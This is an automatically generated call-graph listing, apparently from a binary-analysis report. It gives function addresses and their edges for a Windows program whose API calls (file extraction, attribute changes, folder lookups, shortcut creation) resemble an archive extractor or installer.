11983->11985 11986 402ce4 11985->11986 11987 402cf8 11986->11987 11989 40289b memmove 11986->11989 11987->11982 11989->11987 11991 404820 11990->11991 11992 402cce memmove 11991->11992 11993 404847 ??3@YAXPAX 11992->11993 11993->10931 11996 40291b 11994->11996 11995 402927 lstrcmpW 11995->11996 11997 402944 11995->11997 11996->11995 11996->11997 11997->10986 12011 401397 11998->12011 12014 4169ec 11998->12014 12022 415eea _EH_prolog 11998->12022 11999 40115f 11999->11398 12604 401519 12003->12604 12006 401503 2 API calls 12007 40158d ??3@YAXPAX 12006->12007 12609 4081be ??3@YAXPAX 12007->12609 12010 4015a2 12010->11404 12012 4013a3 ??3@YAXPAX 12011->12012 12013 4013ac 12011->12013 12012->12013 12013->11999 12015 4169fe 12014->12015 12020 412a6a 3 API calls 12015->12020 12016 416a12 12017 416a49 12016->12017 12021 412a6a 3 API calls 12016->12021 12017->11999 12018 416a26 12018->12017 12041 416891 12018->12041 12020->12016 12021->12018 12023 415f0b 12022->12023 12024 4169ec 13 API calls 12023->12024 12025 415f49 12024->12025 12026 415f75 12025->12026 12027 415f4f 12025->12027 12028 4014eb 2 API calls 12026->12028 12080 415b0a 12027->12080 12030 415f86 12028->12030 12077 418390 _EH_prolog 12030->12077 12054 413b40 12041->12054 12043 4168bd 12043->12017 12044 4168a9 12044->12043 12057 40b2b0 12044->12057 12047 41698a ??3@YAXPAX 12047->12043 12049 416973 memmove 12050 4168f6 12049->12050 12050->12047 12050->12049 12051 41699f memcpy 12050->12051 12052 416995 ??3@YAXPAX 12050->12052 12053 412a6a 3 API calls 12051->12053 12052->12043 12053->12052 12065 413af5 12054->12065 12058 40b300 memcpy 12057->12058 12059 40b2bd 12057->12059 12058->12050 12060 40b2c2 ??2@YAPAXI 12059->12060 12061 40b2eb 12059->12061 12062 40b2d4 memmove 12060->12062 12063 40b2ed ??3@YAXPAX 12060->12063 12061->12063 12062->12063 12063->12058 12066 413b39 12065->12066 12067 413b07 12065->12067 12066->12044 12067->12066 12069 412a36 GetLastError 12067->12069 12070 413465 12067->12070 12069->12067 12071 41348a 12070->12071 12072 4134a6 12071->12072 12074 413512 12071->12074 12072->12067 12075 4134c7 SetFilePointer GetLastError GetLastError EnterCriticalSection LeaveCriticalSection 12074->12075 12076 413536 12075->12076 12076->12072 12088 4180ff 12077->12088 12587 41599a 12080->12587 12110 4157f1 12088->12110 12233 415762 12110->12233 12234 4127e6 ctype 3 API calls 12233->12234 12235 41576b 12234->12235 12236 4127e6 ctype 3 API calls 12235->12236 12237 415773 12236->12237 12238 4127e6 ctype 3 API calls 12237->12238 12239 41577b 12238->12239 12240 4127e6 ctype 3 API calls 12239->12240 12241 415783 12240->12241 12242 4127e6 ctype 3 API calls 12241->12242 12243 41578b 12242->12243 12244 4127e6 ctype 3 API calls 12243->12244 12245 415793 12244->12245 12246 4127e6 ctype 3 API calls 12245->12246 12247 41579d 12246->12247 12248 4127e6 ctype 3 API calls 12247->12248 12249 4157a5 12248->12249 12250 4127e6 ctype 3 API calls 12249->12250 12251 4157b2 12250->12251 12252 4127e6 ctype 3 API calls 12251->12252 12253 4157ba 12252->12253 12254 4127e6 ctype 3 API calls 12253->12254 12255 4157c7 12254->12255 12256 4127e6 ctype 3 API calls 12255->12256 12257 4157cf 12256->12257 12258 4127e6 ctype 3 API calls 12257->12258 12259 4157dc 12258->12259 12260 4127e6 ctype 3 API calls 12259->12260 12261 4157e4 12260->12261 12588 4127e6 ctype 3 API calls 12587->12588 12589 4159a8 12588->12589 12610 4010bd 12604->12610 12607 4014eb 2 API calls 12608 40152f 12607->12608 12608->12006 12609->12010 12611 4083ea 4 API calls 12610->12611 12612 4010c5 12611->12612 12612->12607 12614 401893 12613->12614 12615 401403 2 API calls 12614->12615 12616 4018a0 12615->12616 12617 401795 2 API calls 12616->12617 12618 4018a9 CreateThread 12617->12618 12619 4018d8 12618->12619 12620 4018dd WaitForSingleObject 12618->12620 12637 40133c 12618->12637 12623 408caa 25 API calls 12619->12623 12621 4018fa 12620->12621 12622 40192c 12620->12622 12624 401918 12621->12624 12628 401909 12621->12628 12625 401928 12622->12625 12626 401934 GetExitCodeThread 12622->12626 12623->12620 12629 409606 57 API calls 12624->12629 12625->11425 12627 40194b 12626->12627 12627->12625 12627->12628 12630 40197a SetLastError 12627->12630 12628->12625 12631 409606 57 API calls 12628->12631 12629->12625 12630->12628 12631->12625 12633 4014eb 2 API calls 12632->12633 12634 4016fb 12633->12634 12635 4014eb 2 API calls 12634->12635 12636 401707 12635->12636 12636->11419 12638 401345 12637->12638 12639 401358 12637->12639 12638->12639 12640 401347 Sleep 12638->12640 12641 401391 12639->12641 12642 401383 EndDialog 12639->12642 12640->12638 12642->12641 12644 402701 12643->12644 12644->11429 12645->11480 12647 402965 lstrcmpW 12646->12647 12648 40298d 12646->12648 12649 40297c 12647->12649 12648->11546 12649->12647 12649->12648 12650->11546 12652 403041 12651->12652 12653 403035 12651->12653 12655 402b19 2 API calls 12652->12655 12669 401ed5 GetStdHandle WriteFile 12653->12669 12658 40304b 12655->12658 12656 40303c 12668 402990 ??3@YAXPAX ??3@YAXPAX 12656->12668 12657 403076 12659 402dce 3 API calls 12657->12659 12658->12657 12661 402c21 2 API calls 12658->12661 12660 403088 12659->12660 12662 403096 12660->12662 12663 4030aa 12660->12663 12661->12658 12664 409606 57 API calls 12662->12664 12665 409606 57 API calls 12663->12665 12666 4030a5 ??3@YAXPAX ??3@YAXPAX 12664->12666 12665->12666 12666->12656 12668->11533 12669->12656 12671 402b19 2 API calls 12670->12671 12672 402e25 12671->12672 12673 402e61 12672->12673 12676 402b97 12672->12676 12673->11570 12677 402ba3 12676->12677 12678 402ba9 WideCharToMultiByte 12676->12678 12679 402805 2 API calls 12677->12679 12678->12673 12679->12678 12681 4013d1 2 API calls 12680->12681 12682 402cbb 12681->12682 12683 4013d1 2 API calls 12682->12683 12684 402cc7 12683->12684 12684->11586 12686 4084d0 12685->12686 12687 4084d5 12685->12687 12686->11599 12687->12686 12688 40844b 22 API calls 12687->12688 12688->12686 12689->11599 12690->11618 12691->11617 12692->11620 12693->11621 12694->11626 12695->11630 12696->11634 12697->11638 12698->11645 12700 4083ea 4 API calls 12699->12700 12701 4085e6 12700->12701 12701->11654 12703 4010bd 4 API calls 12702->12703 12704 4085ff 12703->12704 12704->11655 12705->11658 12706->11666 12708 4083ea 4 API calls 12707->12708 12709 408634 12708->12709 12709->11684 12710->11687 13195 418c06 13204 414368 13195->13204 13198 4127e6 ctype 3 API calls 13203 418c26 13198->13203 13199 418c6a 13203->13199 13213 4184f5 ??2@YAPAXI 13203->13213 13217 4142fb 13203->13217 13224 413851 13203->13224 13231 413ef7 13204->13231 13207 413ef7 7 API calls 13208 414382 13207->13208 13236 418adb 13208->13236 13211 418adb 7 API calls 13212 41439a 13211->13212 13212->13198 13214 418504 13213->13214 13215 416407 4 API calls 13214->13215 13216 41851f 13215->13216 13216->13203 13251 407531 13217->13251 13220 407531 2 API calls 13221 414310 13220->13221 13222 407531 2 API calls 13221->13222 13223 414316 13222->13223 13223->13203 13255 4075df 13224->13255 13227 41387c 13227->13203 13228 4075df 2 API calls 13229 41386c 13228->13229 13229->13227 13230 4075df 2 API calls 13229->13230 13230->13227 13232 4127e6 ctype 3 API calls 13231->13232 13233 413eff 13232->13233 13241 413cd1 13233->13241 13237 4127e6 ctype 3 API calls 13236->13237 13238 418ae3 13237->13238 13246 41854a 13238->13246 13242 41271d 4 API calls 13241->13242 13243 413ce9 13242->13243 13244 413d05 13243->13244 13245 4163dd 4 API calls 13243->13245 13244->13207 13245->13243 13247 41271d 4 API calls 13246->13247 13248 418562 13247->13248 13249 41438e 13248->13249 13250 416407 4 API calls 13248->13250 13249->13211 13250->13248 13252 40753c CloseHandle 13251->13252 13254 407551 13251->13254 13253 407547 GetLastError 13252->13253 13252->13254 13253->13254 13254->13220 13258 407591 CreateEventW 13255->13258 13261 40751b 13258->13261 13260 4075b5 13260->13227 13260->13228 13262 407522 13261->13262 13263 407525 GetLastError 13261->13263 13262->13260 13264 40752f 13263->13264 13264->13260 14052 412f0c 14056 412f19 14052->14056 14053 412fb2 14054 412f40 memcpy 14054->14056 14056->14053 14056->14054 14057 412b55 14056->14057 14059 412b5f 14057->14059 14058 413b69 110 API calls 14060 412b8e 14058->14060 14059->14058 14060->14056 14082 405b1f 14083 402a67 2 API calls 14082->14083 14084 405b33 14083->14084 14085 4041b2 7 API calls 14084->14085 14086 405b41 14085->14086 14104 40426d 14086->14104 14088 405b50 14127 404328 14088->14127 14090 405b5f 14150 4043e3 14090->14150 14092 405be5 14169 403b54 14092->14169 14096 402e67 6 API calls 14098 405b68 14096->14098 14097 4041b2 7 API calls 14097->14098 14098->14092 14098->14096 14098->14097 14099 40426d 7 API calls 14098->14099 14100 404328 7 API calls 14098->14100 14101 4043e3 4 API calls 14098->14101 14155 403573 GetEnvironmentVariableW 14098->14155 14163 405aaf 14098->14163 14099->14098 14100->14098 14101->14098 14105 4014eb 2 API calls 14104->14105 14106 40427b 14105->14106 14107 40143c 2 API calls 14106->14107 14108 404286 14107->14108 14109 402ab8 2 API calls 14108->14109 14110 404293 14109->14110 14111 402a67 2 API calls 14110->14111 14112 4042a0 14111->14112 14113 404137 3 API calls 14112->14113 14114 4042b0 ??3@YAXPAX 14113->14114 14115 40143c 2 API calls 14114->14115 14116 4042c4 14115->14116 14117 402ab8 2 API calls 14116->14117 14118 4042d1 14117->14118 14119 402a67 2 API calls 14118->14119 14120 4042de 14119->14120 14121 404137 3 API calls 14120->14121 14122 4042ee ??3@YAXPAX 14121->14122 14123 402a67 2 API calls 14122->14123 14124 404305 14123->14124 14125 404137 3 API calls 14124->14125 14126 404314 ??3@YAXPAX ??3@YAXPAX 14125->14126 14126->14088 14128 4014eb 2 API calls 14127->14128 14129 404336 14128->14129 14130 40143c 2 API calls 14129->14130 14131 404341 14130->14131 14132 402ab8 2 API calls 14131->14132 14133 40434e 14132->14133 14134 402a67 2 API calls 14133->14134 14135 40435b 14134->14135 14136 404137 3 API calls 14135->14136 14137 40436b ??3@YAXPAX 14136->14137 14138 40143c 2 API calls 14137->14138 14139 40437f 14138->14139 14140 402ab8 2 API calls 14139->14140 14141 40438c 14140->14141 14142 402a67 2 API calls 14141->14142 14143 404399 14142->14143 14144 404137 3 API calls 14143->14144 14145 4043a9 ??3@YAXPAX 14144->14145 14146 402a67 2 API calls 14145->14146 14147 4043c0 14146->14147 14148 404137 3 API calls 14147->14148 14149 4043cf ??3@YAXPAX ??3@YAXPAX 14148->14149 14149->14090 14151 402a67 2 API calls 14150->14151 14152 4043f6 14151->14152 14153 404137 3 API calls 14152->14153 14154 404407 ??3@YAXPAX 14153->14154 14154->14098 14156 4014eb 2 API calls 14155->14156 14157 403597 14156->14157 14158 402aa0 2 API calls 14157->14158 14159 4035a5 14158->14159 14160 402aa0 2 API calls 14159->14160 14161 4035b1 GetEnvironmentVariableW 14160->14161 14162 4035bf 14161->14162 14162->14098 14164 405b1a ??3@YAXPAX 14163->14164 14167 405ac5 14163->14167 14164->14092 14164->14098 14165 401f6a CharUpperW 14165->14167 14166 402cce memmove 14166->14167 14167->14164 14167->14165 14167->14166 14168 4035f9 3 API calls 14167->14168 14168->14167 14170 403b71 14169->14170 14172 403b7d 14169->14172 14171 403b77 _wtol 14170->14171 14170->14172 14171->14172 14173 403c11 SHGetSpecialFolderPathW 14172->14173 14174 403e91 ??3@YAXPAX 14172->14174 14173->14174 14175 403c29 14173->14175 14176 402a67 2 API calls 14175->14176 14177 403c38 14176->14177 14178 4014eb 2 API calls 14177->14178 14179 403c40 14178->14179 14180 4014eb 2 API calls 14179->14180 14181 403c48 14180->14181 14182 4014eb 2 API calls 14181->14182 14183 403c50 14182->14183 14184 4014eb 2 API calls 14183->14184 14185 403c58 14184->14185 14186 4014eb 2 API calls 14185->14186 14187 403c60 14186->14187 14188 4014eb 2 API calls 14187->14188 14189 403c68 14188->14189 14190 4014eb 2 API calls 14189->14190 14191 403c70 14190->14191 14192 4014eb 2 API calls 14191->14192 14193 403c78 14192->14193 14230 403333 14193->14230 14196 403cc9 14199 403333 2 API calls 14196->14199 14197 403c89 7 API calls 14198 403e81 ??3@YAXPAX ??3@YAXPAX 14197->14198 14198->14174 14200 403cd3 14199->14200 14201 403333 2 API calls 14200->14201 14202 403cdd 14201->14202 14203 403333 2 API calls 14202->14203 14204 403ce7 14203->14204 14205 403333 2 API calls 14204->14205 14206 403cf1 14205->14206 14207 403333 2 API calls 14206->14207 14208 403cfb 14207->14208 14209 403333 2 API calls 14208->14209 14210 403d05 14209->14210 14211 403333 2 API calls 14210->14211 14212 403d0f _wtol 14211->14212 14213 403d21 14212->14213 14220 403d38 14212->14220 14217 401403 2 API calls 14213->14217 14214 401795 2 API calls 14215 403d5a 14214->14215 14216 403d75 14215->14216 14218 4014bc 2 API calls 14215->14218 14219 4039e7 88 API calls 14216->14219 14217->14220 14221 403d6b 14218->14221 14222 403d7d 14219->14222 14220->14214 14223 401795 2 API calls 14221->14223 14224 403e48 7 API calls 14222->14224 14225 4014bc 2 API calls 14222->14225 14223->14216 14224->14198 14226 403d92 14225->14226 14227 402ab8 2 API calls 14226->14227 14228 403d9f CoCreateInstance 14227->14228 14228->14224 14229 403dc1 14228->14229 14229->14224 14232 40334d 14230->14232 14231 403392 14231->14196 14231->14197 14232->14231 14233 401795 2 API calls 14232->14233 14233->14232 14234 41872c 14235 418737 14234->14235 14236 418748 14234->14236 14235->14236 14238 413880 14235->14238 14243 4075cb ResetEvent 14238->14243 14241 4075cb 2 API calls 14242 413899 14241->14242 14242->14235 14244 40751b GetLastError 14243->14244 14245 4075dd 14244->14245 14245->14241 10346 4120c0 10347 4120ce 10346->10347 10352 4120d8 10346->10352 10367 402a2f 10347->10367 10351 4120e2 10352->10351 10353 411f90 10352->10353 10360 413b69 10352->10360 10355 411fb6 10353->10355 10359 411fa0 10353->10359 10354 411fdb 10354->10352 10355->10354 10372 411000 10355->10372 10357 411fae 10357->10352 10359->10357 10375 411a40 10359->10375 10361 413ba9 10360->10361 10362 413b75 10360->10362 10361->10352 10362->10361 10387 415588 10362->10387 10393 41247f SetFileTime 10362->10393 10394 41229a 10362->10394 10397 4012ab 10362->10397 10746 4029c5 10367->10746 10370 402a3d 10370->10352 10371 402a3e VirtualAlloc 10371->10352 10380 410e70 memset 10372->10380 10377 411a5d 10375->10377 10376 411a7d 10376->10359 10377->10376 10382 4111d0 10377->10382 10379 411dfa 10379->10359 10381 410ecc 10380->10381 10381->10359 10383 4111f3 10382->10383 10384 410e70 memset 10383->10384 10385 411286 10383->10385 10386 41127e 10384->10386 10385->10379 10386->10379 10390 415594 10387->10390 10388 415641 10388->10362 10390->10388 10391 415549 106 API calls 10390->10391 10403 418eab 10390->10403 10407 415428 10390->10407 10391->10390 10393->10362 10395 4122a4 FindCloseChangeNotification 10394->10395 10396 4122af 10394->10396 10395->10396 10396->10362 10398 4012bf 10397->10398 10401 4012b3 10397->10401 10399 4012dc 10398->10399 10742 41249c 10398->10742 10399->10401 10402 4012e9 SetFileAttributesW 10399->10402 10401->10362 10402->10401 10404 418ebc 10403->10404 10405 418ecc 10403->10405 10412 412ace 10404->10412 10405->10390 10408 415442 10407->10408 10424 412434 10408->10424 10427 401b0b 10408->10427 10409 415476 10409->10390 10417 4124ac 10412->10417 10414 412ae7 10420 4129fa 10414->10420 10416 412b06 10416->10405 10418 4124ba 10417->10418 10419 4124bd WriteFile 10417->10419 10418->10419 10419->10414 10421 412a01 10420->10421 10422 412a04 GetLastError 10420->10422 10421->10416 10423 412a0e 10422->10423 10423->10416 10488 41236b 10424->10488 10428 401b27 10427->10428 10433 401b1d 10427->10433 10429 401b54 10428->10429 10493 4014eb 10428->10493 10518 412574 10429->10518 10433->10409 10434 401e47 ??3@YAXPAX 10438 412574 VariantClear 10434->10438 10435 401b82 10496 401403 10435->10496 10438->10433 10439 401b8d 10500 4017c0 10439->10500 10443 401bac ??3@YAXPAX 10444 401e0d ??3@YAXPAX 10443->10444 10450 401bbe 10443->10450 10446 412574 VariantClear 10444->10446 10446->10433 10447 401bdf 10448 412574 VariantClear 10447->10448 10449 401be7 ??3@YAXPAX 10448->10449 10449->10429 10450->10447 10451 401c49 10450->10451 10452 401c0a 10450->10452 10455 401c87 10451->10455 10456 401c6e 10451->10456 10453 412574 VariantClear 10452->10453 10454 401c1c ??3@YAXPAX 10453->10454 10454->10429 10458 401ca9 GetLocalTime SystemTimeToFileTime 10455->10458 10459 401c8f 10455->10459 10457 412574 VariantClear 10456->10457 10460 401c76 ??3@YAXPAX 10457->10460 10458->10459 10459->10452 10461 401cc6 10459->10461 10462 401cdd 10459->10462 10460->10429 10522 4039e7 lstrlenW 10461->10522 10509 40367d GetFileAttributesW 10462->10509 10466 401e19 GetLastError 10466->10444 10467 401cfd ??2@YAPAXI 10469 401d09 10467->10469 10468 401e0f 10468->10466 10546 412468 10469->10546 10472 401df4 10475 412574 VariantClear 10472->10475 10473 401d44 GetLastError 10549 4013d1 10473->10549 10475->10444 10476 401d56 10477 4039e7 88 API calls 10476->10477 10480 401d64 ??3@YAXPAX 10476->10480 10478 401db1 10477->10478 10478->10480 10482 412468 2 API calls 10478->10482 10481 401d81 10480->10481 10483 412574 VariantClear 10481->10483 10485 401dd6 10482->10485 10484 401d8f ??3@YAXPAX 10483->10484 10484->10429 10486 401dda GetLastError 10485->10486 10487 401deb ??3@YAXPAX 10485->10487 10486->10480 10487->10472 10489 41229a FindCloseChangeNotification 10488->10489 10490 412376 10489->10490 10491 41237a CreateFileW 10490->10491 10492 41239f 10490->10492 10491->10492 10492->10409 10552 4011b7 10493->10552 10497 40141a 10496->10497 10498 4011b7 2 API calls 10497->10498 10499 401425 10498->10499 10499->10439 10501 4013d1 2 API calls 10500->10501 10502 4017ce 10501->10502 10557 4014bc 10502->10557 10504 4017d9 10505 40143c 10504->10505 10506 401448 10505->10506 10508 40145a 10505->10508 10507 4011b7 2 API calls 10506->10507 10507->10508 10508->10443 10510 401ce9 10509->10510 10511 40369a 10509->10511 10510->10466 10510->10467 10510->10468 10512 4036ab 10511->10512 10513 40369e SetLastError 10511->10513 10512->10510 10514 4036b4 10512->10514 10516 4036c2 FindFirstFileW 10512->10516 10513->10510 10564 403650 10514->10564 10516->10514 10517 4036d5 FindClose CompareFileTime 10516->10517 10517->10510 10517->10514 10521 412530 10518->10521 10519 412568 10519->10433 10520 412551 VariantClear 10520->10433 10521->10519 10521->10520 10523 402a67 2 API calls 10522->10523 10524 403a08 10523->10524 10525 4011b7 2 API calls 10524->10525 10533 403a18 10524->10533 10525->10533 10527 403a66 GetSystemTimeAsFileTime GetFileAttributesW 10528 403a85 10527->10528 10529 403a7b 10527->10529 10532 401e6b 4 API calls 10528->10532 10536 403a8b ??3@YAXPAX 10528->10536 10531 40367d 22 API calls 10529->10531 10530 403b0a 10534 403b3a 10530->10534 10530->10536 10531->10528 10544 403a98 10532->10544 10533->10527 10533->10530 10613 401e6b CreateDirectoryW 10533->10613 10535 409606 57 API calls 10534->10535 10540 403b44 ??3@YAXPAX 10535->10540 10543 403b4f 10536->10543 10537 403a9d 10619 409606 10537->10619 10538 403ab0 memcpy 10538->10544 10539 403afe ??3@YAXPAX 10539->10543 10540->10543 10543->10452 10544->10537 10544->10538 10544->10539 10545 401e6b 4 API calls 10544->10545 10545->10544 10739 412451 10546->10739 10550 4011b7 2 API calls 10549->10550 10551 4013eb 10550->10551 10551->10476 10553 401203 10552->10553 10554 4011c5 ??2@YAPAXI 10552->10554 10553->10434 10553->10435 10554->10553 10555 4011e6 ??3@YAXPAX 10554->10555 10555->10553 10560 401472 10557->10560 10559 4014cc 10559->10504 10561 4014b6 10560->10561 10562 401486 10560->10562 10561->10559 10563 4011b7 2 API calls 10562->10563 10563->10561 10570 4032e9 10564->10570 10566 403659 10567 40367a 10566->10567 10568 40365e GetLastError 10566->10568 10567->10510 10569 403669 10568->10569 10569->10510 10571 4032f2 10570->10571 10572 4032f6 GetFileAttributesW 10570->10572 10571->10566 10573 403307 10572->10573 10574 40330c 10572->10574 10573->10566 10575 403310 SetFileAttributesW 10574->10575 10576 40332a 10574->10576 10578 403326 10575->10578 10579 40331d DeleteFileW 10575->10579 10581 4031dc 10576->10581 10578->10566 10579->10566 10602 402a67 10581->10602 10583 4031f3 10606 402ab8 10583->10606 10585 403200 FindFirstFileW 10586 4032b8 SetFileAttributesW 10585->10586 10600 403222 10585->10600 10588 4032c3 RemoveDirectoryW 10586->10588 10589 4032db ??3@YAXPAX 10586->10589 10587 401403 2 API calls 10587->10600 10588->10589 10590 4032d0 ??3@YAXPAX 10588->10590 10591 4032e3 10589->10591 10590->10591 10591->10566 10593 402ab8 2 API calls 10593->10600 10594 403252 lstrcmpW 10597 403268 lstrcmpW 10594->10597 10598 40329b FindNextFileW 10594->10598 10595 403287 SetFileAttributesW 10595->10589 10596 403290 DeleteFileW 10595->10596 10596->10600 10597->10598 10597->10600 10599 4032b1 FindClose 10598->10599 10598->10600 10599->10586 10600->10587 10600->10589 10600->10593 10600->10594 10600->10595 10600->10598 10601 4031dc 2 API calls 10600->10601 10610 401795 10600->10610 10601->10600 10603 402a7e 10602->10603 10604 4011b7 2 API calls 10603->10604 10605 402a89 10604->10605 10605->10583 10607 402ac5 10606->10607 10608 401472 2 API calls 10607->10608 10609 402ad0 10608->10609 10609->10585 10611 401472 2 API calls 10610->10611 10612 40179f 10611->10612 10612->10600 10614 401eac 10613->10614 10615 401e7c GetLastError 10613->10615 10614->10533 10616 401e96 GetFileAttributesW 10615->10616 10618 401e8b 10615->10618 10616->10614 10616->10618 10617 401e8c SetLastError 10617->10533 10618->10614 10618->10617 10630 40247d 10619->10630 10622 4096e9 10626 409522 27 API calls 10622->10626 10623 40963b GetLastError FormatMessageW 10624 409669 FormatMessageW 10623->10624 10625 40967e lstrlenW lstrlenW ??2@YAPAXI lstrcpyW lstrcpyW 10623->10625 10624->10622 10624->10625 10650 409522 10625->10650 10628 4096f5 10626->10628 10628->10536 10631 402494 10630->10631 10632 4024c5 GetLastError wsprintfW GetEnvironmentVariableW GetLastError 10631->10632 10633 4024bb wvsprintfW 10631->10633 10634 402575 SetLastError 10632->10634 10635 4024fd ??2@YAPAXI GetEnvironmentVariableW 10632->10635 10633->10622 10633->10623 10634->10633 10639 40258c 10634->10639 10636 40252c GetLastError 10635->10636 10649 40255e ??3@YAXPAX 10635->10649 10640 402532 10636->10640 10636->10649 10638 4025ab lstrlenA ??2@YAPAXI 10643 402616 MultiByteToWideChar 10638->10643 10644 4025dc GetLocaleInfoW 10638->10644 10639->10638 10660 402427 10639->10660 10641 402561 10640->10641 10645 40253c lstrcmpiW 10640->10645 10641->10634 10643->10633 10644->10643 10647 402603 _wtol 10644->10647 10648 40254b ??3@YAXPAX 10645->10648 10645->10649 10646 4025a1 10646->10638 10647->10643 10648->10641 10649->10641 10651 409531 10650->10651 10652 409597 ??3@YAXPAX LocalFree 10650->10652 10667 4083ea 10651->10667 10652->10628 10655 409569 10672 40844b 10655->10672 10656 409557 IsBadReadPtr 10656->10655 10661 402431 GetUserDefaultUILanguage 10660->10661 10662 402475 10660->10662 10663 402452 GetSystemDefaultUILanguage 10661->10663 10664 40244e 10661->10664 10662->10646 10663->10662 10665 40245e GetSystemDefaultLCID 10663->10665 10664->10646 10665->10662 10666 40246e 10665->10666 10666->10662 10668 4014eb 2 API calls 10667->10668 10669 4083fb 10668->10669 10670 408447 IsWindow 10669->10670 10671 408423 GetSystemMetrics GetSystemMetrics 10669->10671 10670->10655 10670->10656 10671->10670 10673 40845a 10672->10673 10674 4084be 10672->10674 10673->10674 10675 402a67 2 API calls 10673->10675 10684 4081be ??3@YAXPAX 10674->10684 10676 40846b 10675->10676 10677 402a67 2 API calls 10676->10677 10678 408476 10677->10678 10685 4044e2 10678->10685 10681 4044e2 20 API calls 10682 408488 ??3@YAXPAX ??3@YAXPAX 10681->10682 10682->10674 10684->10652 10692 402e67 10685->10692 10689 4044fa 10728 4044ae 10689->10728 10693 4014eb ??2@YAPAXI ??3@YAXPAX 10692->10693 10694 402e75 10693->10694 10695 402e85 ExpandEnvironmentStringsW 10694->10695 10696 4011b7 ??2@YAPAXI ??3@YAXPAX 10694->10696 10697 402ea9 10695->10697 10698 402e9e ??3@YAXPAX 10695->10698 10696->10695 10699 402aa0 ??2@YAPAXI ??3@YAXPAX 10697->10699 10700 402ee0 10698->10700 10701 402eb7 ExpandEnvironmentStringsW 10699->10701 10705 4041b2 10700->10705 10702 402ec4 10701->10702 10703 40143c ??2@YAPAXI ??3@YAXPAX 10702->10703 10704 402ed8 ??3@YAXPAX 10703->10704 10704->10700 10706 4014eb ??2@YAPAXI ??3@YAXPAX 10705->10706 10707 4041c0 10706->10707 10708 40143c ??2@YAPAXI ??3@YAXPAX 10707->10708 10709 4041cb 10708->10709 10710 402ab8 ??2@YAPAXI ??3@YAXPAX 10709->10710 10711 4041d8 10710->10711 10712 402a67 ??2@YAPAXI ??3@YAXPAX 10711->10712 10713 4041e5 10712->10713 10714 404137 ??2@YAPAXI ??3@YAXPAX memmove 10713->10714 10715 4041f5 ??3@YAXPAX 10714->10715 10716 40143c ??2@YAPAXI ??3@YAXPAX 10715->10716 10717 404209 10716->10717 10718 402ab8 ??2@YAPAXI ??3@YAXPAX 10717->10718 10719 404216 10718->10719 10720 402a67 ??2@YAPAXI ??3@YAXPAX 10719->10720 10721 404223 10720->10721 10722 404137 ??2@YAPAXI ??3@YAXPAX memmove 10721->10722 10723 404233 ??3@YAXPAX 10722->10723 10724 402a67 ??2@YAPAXI ??3@YAXPAX 10723->10724 10725 40424a 10724->10725 10726 404137 ??2@YAPAXI ??3@YAXPAX memmove 10725->10726 10727 404259 ??3@YAXPAX ??3@YAXPAX 10726->10727 10727->10689 10729 402e67 6 API calls 10728->10729 10730 4044b9 10729->10730 10731 40426d 7 API calls 10730->10731 10732 4044c6 10731->10732 10733 404328 7 API calls 10732->10733 10734 4044d1 10733->10734 10735 4043e3 ??2@YAPAXI ??3@YAXPAX memmove ??3@YAXPAX 10734->10735 10736 4044d7 10735->10736 10737 402e67 6 API calls 10736->10737 10738 4044dd 10737->10738 10738->10681 10740 412434 2 API calls 10739->10740 10741 401d3c 10740->10741 10741->10472 10741->10473 10745 41247f SetFileTime 10742->10745 10744 4124a9 10744->10399 10745->10744 10747 4029d5 10746->10747 10753 4029d1 10746->10753 10748 4029e5 GlobalMemoryStatusEx 10747->10748 10747->10753 10749 4029f3 10748->10749 10748->10753 10750 40247d 19 API calls 10749->10750 10749->10753 10751 402a0d 10750->10751 10754 409599 10751->10754 10753->10370 10753->10371 10755 4083ea 4 API calls 10754->10755 10756 4095a7 IsWindow 10755->10756 10757 4095d0 10756->10757 10758 4095be IsBadReadPtr 10756->10758 10759 40844b 22 API calls 10757->10759 10758->10757 10760 4095f7 10759->10760 10763 4081be ??3@YAXPAX 10760->10763 10762 409601 10762->10753 10763->10762 12711 414dcf _EH_prolog 12722 414e02 12711->12722 12712 414f2f 12742 40122a 12712->12742 12714 414f44 12756 414b2d 12714->12756 12715 414f59 12718 414f66 ??2@YAPAXI 12715->12718 12716 414be8 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 12716->12722 12733 414f80 12718->12733 12719 414da5 8 API calls 12719->12722 12720 414b0b 4 API calls 12720->12722 12721 412885 VirtualFree ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ctype 12721->12722 12722->12712 12722->12716 12722->12719 12722->12720 12722->12721 12723 414cbf _CxxThrowException 12722->12723 12732 414e24 12722->12732 12723->12722 12724 414fca 12726 414c38 3 API calls 12724->12726 12725 41502d ??2@YAPAXI 12725->12733 12729 414fe2 12726->12729 12727 414c38 3 API calls 12727->12733 12730 414b2d ctype 3 API calls 12729->12730 12730->12732 12731 414b2d ctype 3 API calls 12731->12733 12733->12724 12733->12725 12733->12727 12733->12731 12733->12732 12738 414491 155 API calls 12733->12738 12739 4150aa 12733->12739 12752 4156e6 12733->12752 12759 415346 ??2@YAPAXI 12733->12759 12761 415693 12733->12761 12735 414c38 3 API calls 12736 4150cf 12735->12736 12737 414b2d ctype 3 API calls 12736->12737 12737->12732 12738->12733 12739->12735 12743 401238 GetDiskFreeSpaceExW 12742->12743 12744 40128e SendMessageW 12742->12744 12743->12744 12745 401250 12743->12745 12750 401276 12744->12750 12745->12744 12746 40247d 19 API calls 12745->12746 12747 401269 12746->12747 12748 409599 27 API calls 12747->12748 12749 40126f 12748->12749 12749->12750 12751 401287 12749->12751 12750->12714 12750->12715 12751->12744 12753 41570f 12752->12753 12765 415549 12753->12765 12757 4127e6 ctype 3 API calls 12756->12757 12758 414b3b 12757->12758 12760 415378 12759->12760 12760->12733 12763 415698 12761->12763 12762 4156bf 12762->12733 12763->12762 12764 415428 106 API calls 12763->12764 12764->12763 12768 41554e 12765->12768 12766 415584 12766->12733 12767 415428 106 API calls 12767->12768 12768->12766 12768->12767 10343 4123f1 ReadFile 13797 419c90 13802 407613 InitializeCriticalSection 13797->13802 13799 419c9a 13800 4192a8 2 API calls 13799->13800 13801 419ca4 13800->13801 13802->13799 10764 401198 SysAllocString 14787 404ba6 14791 404bbb 14787->14791 14788 404be9 14789 412833 memmove 14788->14789 14790 404bf7 14789->14790 14791->14788 14794 402990 ??3@YAXPAX ??3@YAXPAX 14791->14794 14793 404bda ??3@YAXPAX 14793->14791 14794->14793 14800 4015ac 14801 401556 6 API calls 14800->14801 14802 4015b9 14801->14802 14804 4015bd 14802->14804 14805 401198 SysAllocString 14802->14805 14805->14804
                                              APIs
